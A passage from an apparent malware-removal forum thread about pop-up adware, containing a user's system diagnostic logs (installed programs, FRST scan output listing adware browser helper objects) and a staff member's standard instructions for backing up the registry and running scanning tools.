Processor: AMD Phenom(tm) II X6 1065T Processor | CPU 1 | 783/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 1379 GiB total, 1194.133 GiB free.
D: is CDROM ()
E: is Removable
G: is Removable
H: is Removable
I: is Removable
J: is Removable
K: is Removable
.
==== Disabled Device Manager Items =============
.
Class GUID: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Description: qknfd
Device ID: ROOT\LEGACY_QKNFD\0000
Manufacturer:
Name: qknfd
PNP Device ID: ROOT\LEGACY_QKNFD\0000
Service: qknfd
.
==== System Restore Points ===================
.
RP279: 12/26/2014 11:31:46 AM - Windows Update
RP280: 12/29/2014 9:47:33 PM - Windows Update
RP281: 1/3/2015 6:23:04 AM - Windows Update
RP282: 1/7/2015 9:49:21 AM - Windows Update
RP283: 1/10/2015 2:16:34 PM - Windows Update
RP284: 1/13/2015 7:50:59 AM - Windows Update
RP285: 1/14/2015 10:39:23 PM - Windows Update
RP286: 1/14/2015 11:09:50 PM - Configured MediaEspresso
.
==== Installed Programs ======================
.
Adobe AIR
Adobe Flash Player 16 ActiveX
Adobe Flash Player 16 NPAPI
Adobe Reader X (10.1.13) MUI
Adobe Refresh Manager
Agatha Christie - Death on the Nile
Amazon MP3 Downloader 1.0.17
AMD DnD V1.0.20
Apple Application Support
Apple Mobile Device Support
Apple Software Update
ATI AVIVO64 Codecs
ATI Catalyst Install Manager
Bejeweled 2 Deluxe
Bonjour
Brother MFL-Pro Suite DCP-7065DN
Build-a-lot 4 - Power Source
CANON iMAGE GATEWAY MyCamera Download Plugin
CANON iMAGE GATEWAY Task for ZoomBrowser EX
Canon Internet Library for ZoomBrowser EX
Canon MovieEdit Task for ZoomBrowser EX
Canon Utilities ImageBrowser EX
Canon Utilities ZoomBrowser EX
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-core-static
ccc-utility64
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
Chronicles of Albian
Cradle of Rome 2
CyberLink MediaEspresso
CyberLink PowerDVD 10
D3DX10
Definition Update for Microsoft Office 2010 (KB2910899) 32-Bit Edition
Dora's World Adventure
eBay Worldwide
FamilySearch Indexing 3.13.1
Final Drive: Nitro
FromDocToPDF Internet Explorer Toolbar
Galerie de photos Windows Live
Gateway Games
Gateway Recovery Management
Gateway Registration
Gateway ScreenSaver
Gateway Updater
Governor of Poker 2 Premium Edition
Hotkey Utility
HP LaserJet 1020 Series
HP Support Solutions Framework
Identity Card
iTunes
Jewel Match 3
Junk Mail filter update
Kaspersky Internet Security
Malwarebytes Anti-Malware version 2.0.4.1028
Mesh Runtime
Microsoft .NET Framework 1.1
Microsoft .NET Framework 4.5.2
Microsoft Application Error Reporting
Microsoft Office 2010
Microsoft Office Access MUI (English) 2010
Microsoft Office Access Setup Metadata MUI (English) 2010
Microsoft Office Excel MUI (English) 2010
Microsoft Office Groove MUI (English) 2010
Microsoft Office InfoPath MUI (English) 2010
Microsoft Office Office 64-bit Components 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Professional Plus 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010
Microsoft Office Proofing (English) 2010
Microsoft Office Publisher MUI (English) 2010
Microsoft Office Shared 64-bit MUI (English) 2010
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
Microsoft Office Shared MUI (English) 2010
Microsoft Office Shared Setup Metadata MUI (English) 2010
Microsoft Office Word MUI (English) 2010
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Web Publishing Wizard 1.52
Mozilla Firefox 34.0.5 (x86 en-US)
Mozilla Maintenance Service
MSVCRT
MSVCRT_amd64
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MSXML 4.0 SP3 Parser
MSXML 4.0 SP3 Parser (KB2758694)
Mystery of Mortlake Mansion
NEF Codec
Nero BackItUp 10
Nero BackItUp 10 Help (CHM)
Nero Control Center 10
Nero ControlCenter 10 Help (CHM)
Nero Core Components 10
Nero DiscSpeed 10
Nero DiscSpeed 10 Help (CHM)
Nero Express 10
Nero Express 10 Help (CHM)
Nero Multimedia Suite 10 Essentials
Nero RescueAgent 10
Nero RescueAgent 10 Help (CHM)
Nero StartSmart 10
Nero StartSmart 10 Help (CHM)
Nero Update
NOOK for PC
Norton Online Backup
Nuance PaperPort 12
Nuance PDF Viewer Plus
OLYMPUS Raw Codec
PaperPort Image Printer 64-bit
Penguins!
Personal Ancestral File 5
Personal Ancestral File 5  Lessons
Plants vs. Zombies - Game of the Year
Polar Bowler
Polar Golfer
Realtek High Definition Audio Driver
Reference Point Software Template for APA format, Word 2010
Reference Point Template ver: Word 2010, APA 6th Ed.
RootsMagic 6.3.0.2
Scansoft PDF Professional
Security Update for Microsoft Excel 2010 (KB2910902) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553154) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687423) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2810073) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2850016) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2880971) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2881071) 32-Bit Edition
Security Update for Microsoft Word 2010 (KB2899519) 32-Bit Edition
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition
Skype™ 6.11
The Print Shop 23.1
Torchlight
TurboTax 2012
TurboTax 2012 widiper
TurboTax 2012 WinPerFedFormset
TurboTax 2012 WinPerReleaseEngine
TurboTax 2012 WinPerTaxSupport
TurboTax 2012 wrapper
TurboTax 2013
TurboTax 2013 widiper
TurboTax 2013 WinPerFedFormset
TurboTax 2013 WinPerReleaseEngine
TurboTax 2013 WinPerTaxSupport
TurboTax 2013 wrapper
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition
Update for Microsoft Excel 2010 (KB2589348) 32-Bit Edition
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817396) 32-Bit Edition
Update for Microsoft Office 2010 (KB2553140) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589386) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597089) 32-Bit Edition
Update for Microsoft Office 2010 (KB2687275) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837602) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition
Update for Microsoft Office 2010 (KB2883019) 32-Bit Edition
Update for Microsoft Office 2010 (KB2889818) 32-Bit Edition
Update for Microsoft Office 2010 (KB2889828) 32-Bit Edition
Update for Microsoft Office 2010 (KB2910896) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2597088) 32-Bit Edition
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition
Update for Microsoft PowerPoint 2010 (KB2880517) 32-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition
Update Installer for WildTangent Games App
Virtual Villagers 5 - New Believers
Welcome Center
WildTangent Games App (Gateway Games)
Windows Live
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Language Selector
Windows Live Mail
Windows Live Mesh
Windows Live Messenger
Windows Live MIME IFilter
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live Remote Client
Windows Live Remote Client Resources
Windows Live Remote Service
Windows Live Remote Service Resources
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
Zuma's Revenge
.
==== Event Viewer Messages From Past Week ========
.
1/16/2015 9:25:17 PM, Error: Microsoft-Windows-HAL [12]  - The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
1/16/2015 8:55:19 PM, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  BHDrvx64 qknfd
1/16/2015 8:55:03 PM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the HP Support Solutions Framework Service service to connect.
1/16/2015 8:55:03 PM, Error: Service Control Manager [7000]  - The HP Support Solutions Framework Service service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
1/13/2015 7:30:25 AM, Error: Service Control Manager [7011]  - A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
1/11/2015 6:28:44 PM, Error: Disk [11]  - The driver detected a controller error on \Device\Harddisk6\DR6.
.
==== End Of File ===========================


Thank you in advance for your help.
« Last Edit: January 28, 2015, 07:59:13 AM by kevinf80 »



Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #1 on: January 17, 2015, 05:04:20 PM »
Hello and welcome to SpywareHammer

Follow the instructions in the link below to show hidden files:

http://www.bleepingcomputer.com/tutorials/how-to-see-hidden-files-in-windows/

Next,

Backup the Registry:

Modifying the Registry can create unforeseen problems, so it's always wise to create a backup before doing so.

  • Please download ERUNT from one of the following links: Link1 | Link2 | Link3
  • ERUNT (Emergency Recovery Utility NT) is a free program that allows you to keep a complete backup of your registry and restore it when needed.
  • Double click on erunt-setup.exe to Install ERUNT by following the prompts.
  • NOTE: Do not choose to allow ERUNT to add an Entry to the Startup folder. Click NO.
  • Start ERUNT either by double clicking on the desktop icon or choosing to start the program at the end of the setup process.
  • Choose a location for the backup.
  • Note: the default location is C:\Windows\ERDNT which is acceptable.

  • Make sure that "System registry" and "Current user Registry" check boxes are selected.
  • Click on OK
  • Then click on YES to create the folder.
  • Note: if it is necessary to restore the registry, open the backup folder and start ERDNT.exe

Next,

Any important data, videos, music, pictures etc. that you cannot afford to lose should be backed up if not already done. Go to the following link for basic help/instructions:

https://forums.malwarebytes.org/index.php?/topic/136226-backup-software/

Next,

Run the following scans and post the produced logs:

Step 1

Download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.

Step 2

Please download RogueKiller and save it to your desktop from the following link: http://www.bleepingcomputer.com/download/roguekiller/

  • Quit all running programs.
  • For Windows XP, double-click to start.
  • For Vista, Windows 7/8, right-click on the program and select Run as Administrator to start and when prompted allow it to run.
  • Read and accept the EULA (End User License Agreement)
  • Click Scan to scan the system.
  • When the scan completes select "Report", log will open. Close the program > Don't Fix anything!
  • Post back the report which should also be located here:

C:\Programdata\RogueKiller\Logs <-------- W7/8
C:\Documents and Settings\All Users\Application Data\RogueKiller\Logs <------XP

Thank you,

Kevin...

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #2 on: January 20, 2015, 01:34:28 AM »
Do you still need help?

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #3 on: January 21, 2015, 12:42:13 AM »
Yes, I'm sorry, it took me a while to take a backup.

Here are the results of the scans.

FRST.txt:
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 19-01-2015
Ran by Admin (administrator) on LAWRENCE2 on 20-01-2015 23:22:34
Running from C:\Users\Admin\Desktop
Loaded Profiles: Bonnie & Admin (Available profiles: Bonnie & Admin)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Acer Incorporated) C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Acer Incorporated) C:\Program Files\Gateway\Gateway Updater\UpdaterService.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Spotify Ltd) C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
() C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
(Dropbox, Inc.) C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
() C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10060320 2010-02-09] (Realtek Semiconductor)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-02-10] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [87336 2010-02-03] (CyberLink Corp.)
HKLM-x32\...\Run: [Hotkey Utility] => C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe [627304 2011-08-10] ()
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-11-02] (Apple Inc.)
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46368 2010-03-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [29984 2010-03-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PPort12reminder] => C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe [328992 2010-02-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [143360 2012-09-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2014-10-14] (Microsoft Corporation)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [Spotify Web Helper] => C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1676344 2014-12-11] (Spotify Ltd)
HKU\S-1-5-21-2977827394-2594518940-965070511-1008\...\RunOnce: [ScrSav] => C:\Program Files (x86)\Gateway\Screensaver\run_Gateway.exe [154144 2010-07-29] ()
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event Reminder.lnk
ShortcutTarget: Event Reminder.lnk -> C:\Program Files (x86)\The Print Shop 23.1\Remind.exe (Broderbund Properties LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ImageBrowser EX Agent.lnk
ShortcutTarget: ImageBrowser EX Agent.lnk -> C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe ()
Startup: C:\Users\Bonnie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Admin\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=AGWTDF&pc=MAGW&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=AGWTDF&pc=MAGW&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^S06927^us&si=CPC7u9_BzrkCFeqDQgodWCsAaw&ptb=7591A84B-239C-40EE-A83E-84C8EA746CC3&ind=2013091522&n=77fd56c2&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {30BFC086-8BB7-466F-8E12-0A89A3B33C6C} URL = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites&cd=2XzuyEtN2Y1L1QzutAzzyCtDyByByD0D0Fzz0F0D0D0CyD0AtN0D0Tzu0SyBzyyDtN1L2XzutBtFtCyBtFtDtFtCtN1L1CzutDtBtCtC1V1PtN1L1G1B1V1N2Y1L1Qzu2SyEtDyEyCyE0FyByBtGyB0CtAtBtGtDtAyEzytG0FyC0F0FtGyCyDzy0F0BtDyEyDtD0AyCyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCyB0CyDyCzz0DzztG0B0FyCyDtGtBtDzyyEtGtCtDzyyDtGtDtB0E0CyByCtCyC0CzzyBtA2Q&cr=1308762248&ir=
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {47287947-90A5-41BC-A98B-24214FA5ECE9} URL = https://search.yahoo.com/search?fr=mcafee&type=B010US739D20120919&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {55D8CC73-D9F8-4F92-8EAE-0081BE423565} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3196716
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {88BA080D-DF1A-45D2-8CE2-8461E30FBFFE} URL = http://search.netzero.net/search?action=search&source=browserboxapp&query={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = http://search.coupons.com/search.asp?p=df&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^S06927^us&si=CPC7u9_BzrkCFeqDQgodWCsAaw&ptb=7591A84B-239C-40EE-A83E-84C8EA746CC3&ind=2013091522&n=77fd56c2&psa=&st=sb&searchfor={searchTerms}
BHO: caoupoNpEaK -> {01050D05-D546-B8DC-954D-8334A8A7BF5A} -> C:\ProgramData\caoupoNpEaK\_1Y.x64.dll No File
BHO: AudioCeonvaeert -> {2F344960-763E-9E6C-E973-25241A34D54E} -> C:\ProgramData\AudioCeonvaeert\mRE8_SdP.x64.dll No File
BHO: DiscounntLoCaatOr -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} -> C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll ()
BHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
BHO: SaoftiCoup -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} -> C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll ()
BHO: PrinCECCoupon -> {B4552D3D-6B41-9AF1-3067-72A066972344} -> C:\ProgramData\PrinCECCoupon\jsih.x64.dll No File
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll No File
BHO-x32: No Name -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} ->  No File
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll (Zeon Corporation)
BHO-x32: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
